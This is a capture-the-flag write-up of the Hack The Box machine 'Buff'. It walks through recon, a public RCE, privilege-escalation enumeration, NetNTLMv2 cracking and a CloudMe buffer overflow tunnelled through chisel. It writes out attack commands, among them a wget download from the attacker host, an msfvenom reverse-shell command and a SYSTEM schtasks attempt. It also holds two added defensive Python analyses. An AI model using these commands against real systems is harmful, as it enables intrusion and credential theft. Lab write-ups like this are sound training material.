Buff
Personal Rating: Hard
sudo nmap -sV <IP>
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut
Running (JUST GUESSING): Microsoft Windows XP (85%)
Port 8080 shows this page:

This can be seen at ‘Contact’:
mrb3n's Bro Hut
Made using Gym Management Software 1.0
There are a few obvious web pages, and the backend appears to be PHP based.
Since the pages are PHP, I might scan for PHP parameters if I don't find anything else.
For sign-in, a POST to /include/process_login.php is made with this data for test@aua.com : test:
email=test%40aua.com&password=&p=ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db27ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff
It seems the password is not sent in the clear: the password field is empty and the p parameter carries an encoded value.
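As an added check that is not part of the original writeup, the Python below tests which unsalted digest the login form applies to the password "test" to produce the p value captured above, and shows why a value like that still has to be salted and stretched on the server; the wordlist and the fixed salt are constructed for the demonstration.

```python
import hashlib
import hmac
import os

# Value copied from the page: the p parameter the login form sent for the password "test".
P_PARAM = ("ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db2"
           "7ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff")

# Unsalted digests a browser-side "encoder" commonly applies; the hex length narrows the candidate.
DIGESTS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def identify_digest(password: str, observed_hex: str):
    """Name the unsalted digest that maps password to observed_hex, or None if none matches."""
    name = DIGESTS.get(len(observed_hex))
    if name is None:
        return None
    digest = hashlib.new(name, password.encode("utf-8")).hexdigest()
    return name if digest == observed_hex.lower() else None


def lookup_unsalted(observed_hex: str, wordlist, name: str):
    """Without a salt, one precomputed table inverts the client value for every user at once."""
    table = {hashlib.new(name, w.encode("utf-8")).hexdigest(): w for w in wordlist}
    return table.get(observed_hex.lower())


def store_server_side(client_value: str, salt: bytes = None):
    """Hardened server: treat the client value as the secret and salt-stretch it before storage."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha256", client_value.encode("ascii"), salt, 600_000)
    return salt, key


def verify_server_side(client_value: str, salt: bytes, key: bytes) -> bool:
    """Re-derive the key from the presented value and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", client_value.encode("ascii"), salt, 600_000)
    return hmac.compare_digest(candidate, key)
```

Client-side hashing only changes which string is the password equivalent on the wire; it is not a substitute for TLS or for a salted, slow hash in the database.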
A basic web directory brute force revealed even more pages:
feroxbuster -u http://10.10.10.198:8080/ -x php
“Gym Management System 1.0” actually seems to exist and this looks promising:
RCE
I found an unauthenticated RCE for it on ExploitDB and via searchsploit, but those PoCs were Python 2, so I used a Python 3 version:

Persistence
evil.bat:
./evil.bat
Internal Enumeration
There is an unusual folder "UNP" in Program Files, but it does not seem interesting.
There is a file Tasks.bat in C:\Users\shaun\Documents with these contents:
START C:/xampp/xampp_start.exe
The user we got is not in interesting groups:
PS C:\xampp> net user shaun
I got winPEASx64 on the host and ran it.
wget http://10.10.16.6:8000/winPEASx64.exe -OutFile winpeas.exe
.\winpeas.exe
I collected the systeminfo command output to search for vulnerabilities:
winPEAS found the NetNTLMv2 hash of shaun:
shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000
Cracking it with hashcat shows that the password is empty:
hashcat -a 0 -m 5600 'shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000' /usr/share/seclists/Passwords/rockyou.txt
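As an added example that is not part of the original writeup, the parser below splits the captured line into its hashcat mode 5600 fields and decodes the NTLMv2 client blob (timestamp, client challenge, AV pairs). The point for a defender is the server challenge: a real server picks it at random, so the fixed value 1122334455667788 reported here marks the hash as produced locally by a capture tool rather than by a genuine authentication. The AV pair names follow the NTLM specification; nothing else is assumed.

```python
import struct
from datetime import datetime, timedelta, timezone

# Copied from the page: the line winPEAS reported for shaun, in hashcat mode 5600 layout.
CAPTURED = "shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000"

# Fixed 8-byte challenge that local capture tools supply in place of a server; a genuine
# server challenge is random, so this value indicates a tool-generated hash.
STATIC_TOOL_CHALLENGE = "1122334455667788"

AV_NAMES = {0: "EOL", 1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}


def filetime_to_datetime(filetime: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_netntlmv2(line: str) -> dict:
    """Split a hashcat -m 5600 line and decode the NTLMv2 client blob it carries."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.split(":")
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE: RespType(1) HiRespType(1) Reserved(6) TimeStamp(8)
    # ChallengeFromClient(8) Reserved(4) AvPairs(...) Reserved(4)
    resp_type, hi_resp_type = blob[0], blob[1]
    timestamp = filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0])
    client_challenge = blob[16:24].hex()
    av_pairs, pos = {}, 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        av_pairs[AV_NAMES.get(av_id, f"AvId{av_id}")] = blob[pos:pos + av_len]
        pos += av_len
        if av_id == 0:
            break
    return {
        "user": user, "domain": domain, "server_challenge": server_challenge,
        "nt_proof": nt_proof, "resp_type": resp_type, "hi_resp_type": hi_resp_type,
        "timestamp": timestamp, "client_challenge": client_challenge, "av_pairs": av_pairs,
        "tool_generated": server_challenge.lower() == STATIC_TOOL_CHALLENGE,
    }
```

The all-zero ChannelBindings pair also shows that no channel binding was in play, which is what makes a captured NetNTLMv2 response usable offline in the first place.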
Unauthenticated users seem to be able to create files and write data to C:\windows\tasks and C:\windows\system32\tasks.
shaun has full access to C:\Users\shaun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Also, path injections seem to be possible for many Session Manager DLLs.
There were no interesting existing scheduled tasks:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
I tried to create a scheduled task, but that did not work due to a lack of permissions:
schtasks /Create /RU "SYSTEM" /SC MINUTE /MO 1 /TN "SchedPE" /TR "cmd /c C:\Users\shaun\Documents\privesc.bat"
xampp 7.4.6 seems to be in use.
The server is listening on several ports, but only 8080 and 7460 are accessible from outside.
Port 7460 seems to be unassigned, so I am not sure what runs on it.
I could not place a simple Meterpreter shell on the host because it was blocked by Defender.
I found the interesting file C:\users\shaun\downloads\CloudMe_1112.exe
CloudMe BoF
searchsploit cloudme
Using netstat -ano I could determine that port 8888 is listening locally, which is the port for the CloudMe service. Since it is listening only locally, I established a SOCKS reverse proxy:
ATTACKER: ./chisel server -p 9050 --reverse
TARGET: .\chisel.exe client 10.10.16.6:9050 R:socks
I tried to use this exploit PoC through proxychains over the tunnel, but it reports that the port could not be connected to.
I might create reverse shell shellcode with msfvenom, put it in the ExploitDB PoC and try that one with Python 2 (pyenv).
I finally made it work with this (modified) exploit script: *see appendix
Prerequisites:
msfvenom -p windows/shell_reverse_tcp LPORT=6666 LHOST=10.10.16.6 EXITFUNC=thread -b "\x00\x0a\x0d" -f python
Put the generated shellcode into the Python exploit.
Exploitation:
Attack host, terminal 0:
./chisel server -p 9050 --reverse
Target, terminal 0:
.\chisel.exe client 10.10.16.6:9050 R:socks
Attack host, terminal 1:
msf6 exploit(multi/handler) > run
Attack host, terminal 2:
proxychains python2.7 PoC_exploit_Win10_x64.py
An interesting takeaway for me was the EXITFUNC=thread option. The default is 'process', but the user has no permissions to deal with processes, and I think that was the issue at first. When it worked I also used a reverse shell instead of a bind shell, but I think both could have worked. It was also good practice to generate custom shellcode for the existing PoC, for which I additionally had to fix some simple Python code errors.
Appendix: Python bof Exploit